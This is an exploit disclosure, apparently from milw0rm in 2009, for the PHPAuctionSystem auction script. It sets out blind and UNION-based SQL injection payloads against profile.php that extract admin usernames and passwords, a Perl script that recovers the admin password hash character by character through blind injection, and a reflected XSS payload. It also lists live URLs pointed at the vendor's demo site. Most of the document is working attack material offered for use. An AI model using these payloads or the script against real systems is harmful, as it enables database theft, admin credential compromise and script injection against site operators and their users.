PHPAuctionSystem - Cross-Site Scripting / SQL Injection

#########################
#PHPAuctionSystem#
#########################
Author:x0r
Email:[email protected]
Cms:PhpAuctionSystemvnew
Cmsprice:$59.99
Demo:http://www.phpauctions.info/demo/
##########################

BugIn:\profile.php(Blind\Normal Sql Injection)

Exploit(Blind):
profile.php?user_id=29%20and%20substring(@@version,1,1)=5--

profile.php?user_id=29%20and%20substring(@@version,1,1)=4--
		profile.php?user_id=29and+1=0--
		profile.php?user_id=29and+1=1--
Perl Exploit:

#!/usr/bin/perl -w

      use strict;

      use LWP::Simple;

      my $a;

  my $host = "http://www.phpauctions.info/demo/profile.php?user_id="; #Put
the victim i've used the demo

      my @chars = (48..57, 97..102);

 
      for my $i(1..32) {

         foreach my $ord(@chars) {

       

         $a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");

       

         if($a =~ /coucou/i) {#put the username of the user_id=[id]

           syswrite(STDOUT,chr($ord));

           $i++;

           last;

          }

        }

      } 

Sql Injection: 
		
profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--		
			
		
Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode]

LiveDemo:http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=4--[False]
http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=5--[True]

LiveDemo(XSS):

http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<script>alert(1);</script>

Live Demo Sql:

http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--


Greetz:MyGirlfriend...

# milw0rm.com [2009-01-05]